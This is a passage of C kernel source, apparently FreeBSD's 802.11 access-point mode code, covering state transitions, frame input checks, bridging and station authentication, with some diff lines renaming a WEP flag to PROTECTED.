vap->iv_recv_pspoll = ieee80211_recv_pspoll; } static void sta_disassoc(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) { IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_ASSOC_LEAVE); ieee80211_node_leave(ni); } } static void sta_csa(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) if (ni->ni_inact > vap->iv_inact_init) { ni->ni_inact = vap->iv_inact_init; IEEE80211_NOTE(vap, IEEE80211_MSG_INACT, ni, "%s: inact %u", __func__, ni->ni_inact); } } static void sta_drop(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni->ni_associd != 0) ieee80211_node_leave(ni); } /* * Does a channel change require associated stations to re-associate * so protocol state is correct. This is used when doing CSA across * bands or similar (e.g. HT -> legacy). */ static int isbandchange(struct ieee80211com *ic) { return ((ic->ic_bsschan->ic_flags ^ ic->ic_csa_newchan->ic_flags) & (IEEE80211_CHAN_2GHZ | IEEE80211_CHAN_5GHZ | IEEE80211_CHAN_HALF | IEEE80211_CHAN_QUARTER | IEEE80211_CHAN_HT)) != 0; } /* * IEEE80211_M_HOSTAP vap state machine handler. */ static int hostap_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; case IEEE80211_S_CAC: ieee80211_dfs_cac_stop(vap); break; case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, sta_disassoc, vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_CSA: case IEEE80211_S_RUN: ieee80211_iterate_nodes(&ic->ic_sta, sta_disassoc, vap); /* * Clear overlapping BSS state; the beacon frame * will be reconstructed on transition to the RUN * state and the timeout routines check if the flag * is set before doing anything so this is sufficient. */ ic->ic_flags_ext &= ~IEEE80211_FEXT_NONERP_PR; ic->ic_flags_ht &= ~IEEE80211_FHT_NONHT_PR; /* fall thru... */ case IEEE80211_S_CAC: /* * NB: We may get here because of a manual channel * change in which case we need to stop CAC * XXX no need to stop if ostate RUN but it's ok */ ieee80211_dfs_cac_stop(vap); /* fall thru... */ case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && !IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan)) { /* * Already have a channel; bypass the * scan and startup immediately. * ieee80211_create_ibss will call back to * move us to RUN state. */ ieee80211_create_ibss(vap, vap->iv_des_chan); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: /* * A state change requires a reset; scan. */ ieee80211_check_scan_current(vap); break; default: break; } break; case IEEE80211_S_CAC: /* * Start CAC on a DFS channel. We come here when starting * a bss on a DFS channel (see ieee80211_create_ibss). */ ieee80211_dfs_cac_start(vap); break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_INIT: /* * Already have a channel; bypass the * scan and startup immediately. * Note that ieee80211_create_ibss will call * back to do a RUN->RUN state change. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, vap->iv_flags_ht)); /* NB: iv_bss is changed on return */ break; case IEEE80211_S_CAC: /* * NB: This is the normal state change when CAC * expires and no radar was detected; no need to * clear the CAC timer as it's already expired. */ /* fall thru... */ case IEEE80211_S_CSA: /* * Shorten inactivity timer of associated stations * to weed out sta's that don't follow a CSA. */ ieee80211_iterate_nodes(&ic->ic_sta, sta_csa, vap); /* * Update bss node channel to reflect where * we landed after CSA. */ ieee80211_node_set_chan(vap->iv_bss, ieee80211_ht_adjust_channel(ic, ic->ic_curchan, ieee80211_htchanflags(vap->iv_bss->ni_chan))); /* XXX bypass debug msgs */ break; case IEEE80211_S_SCAN: case IEEE80211_S_RUN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { struct ieee80211_node *ni = vap->iv_bss; ieee80211_note(vap, "synchronized with %s ssid ", ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(ni->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif break; default: break; } /* * Start/stop the authenticator. We delay until here * to allow configuration to happen out of order. */ if (vap->iv_auth->ia_attach != NULL) { /* XXX check failure */ vap->iv_auth->ia_attach(vap); } else if (vap->iv_auth->ia_detach != NULL) { vap->iv_auth->ia_detach(vap); } ieee80211_node_authorize(vap->iv_bss); break; case IEEE80211_S_CSA: if (ostate == IEEE80211_S_RUN && isbandchange(ic)) { /* * On a ``band change'' silently drop associated * stations as they must re-associate before they * can pass traffic (as otherwise protocol state * such as capabilities and the negotiated rate * set may/will be wrong). */ ieee80211_iterate_nodes(&ic->ic_sta, sta_drop, vap); } break; default: break; } return 0; } static void hostap_deliver_data(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m) { struct ether_header *eh = mtod(m, struct ether_header *); struct ifnet *ifp = vap->iv_ifp; /* clear driver/net80211 flags before passing up */ #if __FreeBSD_version >= 1000046 m->m_flags &= ~(M_MCAST | M_BCAST); m_clrprotoflags(m); #else m->m_flags &= ~(M_80211_RX | M_MCAST | M_BCAST); #endif KASSERT(vap->iv_opmode == IEEE80211_M_HOSTAP, ("gack, opmode %d", vap->iv_opmode)); /* * Do accounting. */ ifp->if_ipackets++; IEEE80211_NODE_STAT(ni, rx_data); IEEE80211_NODE_STAT_ADD(ni, rx_bytes, m->m_pkthdr.len); if (ETHER_IS_MULTICAST(eh->ether_dhost)) { m->m_flags |= M_MCAST; /* XXX M_BCAST? */ IEEE80211_NODE_STAT(ni, rx_mcast); } else IEEE80211_NODE_STAT(ni, rx_ucast); /* perform as a bridge within the AP */ if ((vap->iv_flags & IEEE80211_F_NOBRIDGE) == 0) { struct mbuf *mcopy = NULL; if (m->m_flags & M_MCAST) { mcopy = m_dup(m, M_NOWAIT); if (mcopy == NULL) ifp->if_oerrors++; else mcopy->m_flags |= M_MCAST; } else { /* * Check if the destination is associated with the * same vap and authorized to receive traffic. * Beware of traffic destined for the vap itself; * sending it will not work; just let it be delivered * normally. */ struct ieee80211_node *sta = ieee80211_find_vap_node( &vap->iv_ic->ic_sta, vap, eh->ether_dhost); if (sta != NULL) { if (ieee80211_node_is_authorized(sta)) { /* * Beware of sending to ourself; this * needs to happen via the normal * input path. */ if (sta != vap->iv_bss) { mcopy = m; m = NULL; } } else { vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(sta, rx_unauth); } ieee80211_free_node(sta); } } if (mcopy != NULL) { int len, err; len = mcopy->m_pkthdr.len; err = ieee80211_vap_xmitpkt(vap, mcopy); if (err) { /* NB: IFQ_HANDOFF reclaims mcopy */ } else { ifp->if_opackets++; } } } if (m != NULL) { /* * Mark frame as coming from vap's interface. */ m->m_pkthdr.rcvif = ifp; if (m->m_flags & M_MCAST) { /* * Spam DWDS vap's w/ multicast traffic. */ /* XXX only if dwds in use? */ ieee80211_dwds_mcast(vap, m); } if (ni->ni_vlan != 0) { /* attach vlan tag */ m->m_pkthdr.ether_vtag = ni->ni_vlan; m->m_flags |= M_VLANTAG; } ifp->if_input(ifp, m); } } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 0; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int hostap_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (dir != IEEE80211_FC1_DIR_NODS) bssid = wh->i_addr1; else if (type == IEEE80211_FC0_TYPE_CTL) bssid = wh->i_addr1; else { if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (2): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } bssid = wh->i_addr3; } /* * Validate the bssid. */ if (!(type == IEEE80211_FC0_TYPE_MGT && subtype == IEEE80211_FC0_SUBTYPE_BEACON) && !IEEE80211_ADDR_EQ(bssid, vap->iv_bss->ni_bssid) && !IEEE80211_ADDR_EQ(bssid, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (!(dir == IEEE80211_FC1_DIR_TODS || (dir == IEEE80211_FC1_DIR_DSTODS && (vap->iv_flags & IEEE80211_F_DWDS)))) { if (dir != IEEE80211_FC1_DIR_DSTODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); } else { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT | IEEE80211_MSG_WDS, wh, "4-address data", "%s", "DWDS not enabled"); } vap->iv_stats.is_rx_wrongdir++; goto out; } /* check if source STA is associated */ if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "unknown src"); ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_NOT_AUTHED); vap->iv_stats.is_rx_notassoc++; goto err; } if (ni->ni_associd == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "%s", "unassoc src"); IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_NOT_ASSOCED); vap->iv_stats.is_rx_notassoc++; goto err; } /* * Check for power save state change. * XXX out-of-order A-MPDU frames? */ if (((wh->i_fc[1] & IEEE80211_FC1_PWR_MGT) ^ (ni->ni_flags & IEEE80211_NODE_PWR_MGT))) vap->iv_node_ps(ni, wh->i_fc[1] & IEEE80211_FC1_PWR_MGT); /* * For 4-address packets handle WDS discovery * notifications. Once a WDS link is setup frames * are just delivered to the WDS vap (see below). */ if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap == NULL) { if (!ieee80211_node_is_authorized(ni)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT | IEEE80211_MSG_WDS, wh, "4-address data", "%s", "unauthorized port"); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } ieee80211_dwds_discover(ni, m); return type; } /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap != NULL) ieee80211_deliver_data(ni->ni_wdsvap, ni, m); else hostap_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* ensure return frames are unicast */ IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "source is multicast: %s", ether_sprintf(wh->i_addr2)); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (subtype != IEEE80211_FC0_SUBTYPE_AUTH) { /* * Only shared key auth frames with a challenge * should be encrypted, discard all others. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; goto out; } hdrspace = ieee80211_hdrspace(ic, wh); key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } /* * Pass the packet to radiotap before calling iv_recv_mgmt(). * Otherwise iv_recv_mgmt() might pass another packet to * radiotap, resulting in out of order packet captures. */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static void hostap_auth_open(struct ieee80211_node *ni, struct ieee80211_frame *wh, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); if (ni->ni_authmode == IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "open auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX */ /* * Clear any challenge text that may be there if * a previous shared key auth failed and then an * open auth is attempted. */ if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } /* XXX hack to workaround calling convention */ ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq + 1) | (IEEE80211_STATUS_ALG<<16)); return; } if (seq != IEEE80211_AUTH_OPEN_REQUEST) { vap->iv_stats.is_rx_bad_auth++; return; } /* always accept open authentication requests */ if (ni == vap->iv_bss) { ni = ieee80211_dup_bss(vap, wh->i_addr2); if (ni == NULL) return; } else if ((ni->ni_flags & IEEE80211_NODE_AREF) == 0) (void) ieee80211_ref_node(ni); /* * Mark the node as referenced to reflect that it's * reference count has been bumped to insure it remains * after the transaction completes. */ ni->ni_flags |= IEEE80211_NODE_AREF; /* * Mark the node as requiring a valid association id * before outbound traffic is permitted. */ ni->ni_flags |= IEEE80211_NODE_ASSOCID; if (vap->iv_acl != NULL && vap->iv_acl->iac_getpolicy(vap) == IEEE80211_MACCMD_POLICY_RADIUS) { /* * When the ACL policy is set to RADIUS we defer the * authorization to a user agent. Dispatch an event, * a subsequent MLME call will decide the fate of the * station. If the user agent is not present then the * node will be reclaimed due to inactivity. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_ACL, ni->ni_macaddr, "%s", "station authentication defered (radius acl)"); ieee80211_notify_node_auth(ni); } else { IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni->ni_macaddr, "%s", "station authenticated (open)"); /* * When 802.1x is not in use mark the port * authorized at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); } } static void hostap_auth_shared(struct ieee80211_node *ni, struct ieee80211_frame *wh, uint8_t *frm, uint8_t *efrm, int rssi, int nf, uint16_t seq, uint16_t status) { struct ieee80211vap *vap = ni->ni_vap; uint8_t *challenge; int allocbs, estatus; KASSERT(vap->iv_state == IEEE80211_S_RUN, ("state %d", vap->iv_state)); /* * NB: this can happen as we allow pre-shared key * authentication to be enabled w/o wep being turned * on so that configuration of these can be done * in any order. It may be better to enforce the * ordering in which case this check would just be * for sanity/consistency. */ if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", " PRIVACY is disabled"); estatus = IEEE80211_STATUS_ALG; goto bad; } /* * Pre-shared key authentication is evil; accept * it only if explicitly configured (it is supported * mainly for compatibility with clients like Mac OS X). */ if (ni->ni_authmode != IEEE80211_AUTH_AUTO && ni->ni_authmode != IEEE80211_AUTH_SHARED) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad sta auth mode %u", ni->ni_authmode); vap->iv_stats.is_rx_bad_auth++; /* XXX maybe a unique error? */ estatus = IEEE80211_STATUS_ALG; goto bad; } challenge = NULL; if (frm + 1 < efrm) { if ((frm[1] + 2) > (efrm - frm)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "ie %d/%d too long", frm[0], (frm[1] + 2) - (efrm - frm)); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (*frm == IEEE80211_ELEMID_CHALLENGE) challenge = frm; frm += frm[1] + 2; } switch (seq) { case IEEE80211_AUTH_SHARED_CHALLENGE: case IEEE80211_AUTH_SHARED_RESPONSE: if (challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "%s", "no challenge"); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (challenge[1] != IEEE80211_CHALLENGE_LEN) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad challenge len %d", challenge[1]); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } default: break; } switch (seq) { case IEEE80211_AUTH_SHARED_REQUEST: if (ni == vap->iv_bss) { ni = ieee80211_dup_bss(vap, wh->i_addr2); if (ni == NULL) { /* NB: no way to return an error */ return; } allocbs = 1; } else { if ((ni->ni_flags & IEEE80211_NODE_AREF) == 0) (void) ieee80211_ref_node(ni); allocbs = 0; } /* * Mark the node as referenced to reflect that it's * reference count has been bumped to insure it remains * after the transaction completes. */ ni->ni_flags |= IEEE80211_NODE_AREF; /* * Mark the node as requiring a valid associatio id * before outbound traffic is permitted. */ ni->ni_flags |= IEEE80211_NODE_ASSOCID; IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (!ieee80211_alloc_challenge(ni)) { /* NB: don't return error so they rexmit */ return; } get_random_bytes(ni->ni_challenge, IEEE80211_CHALLENGE_LEN); IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "shared key %sauth request", allocbs ? "" : "re"); /* * When the ACL policy is set to RADIUS we defer the * authorization to a user agent. Dispatch an event, * a subsequent MLME call will decide the fate of the * station. If the user agent is not present then the * node will be reclaimed due to inactivity. */ if (vap->iv_acl != NULL && vap->iv_acl->iac_getpolicy(vap) == IEEE80211_MACCMD_POLICY_RADIUS) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_ACL, ni->ni_macaddr, "%s", "station authentication defered (radius acl)"); ieee80211_notify_node_auth(ni); return; } break; case IEEE80211_AUTH_SHARED_RESPONSE: if (ni == vap->iv_bss) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "unknown station"); /* NB: don't send a response */ return; } if (ni->ni_challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "no challenge recorded"); 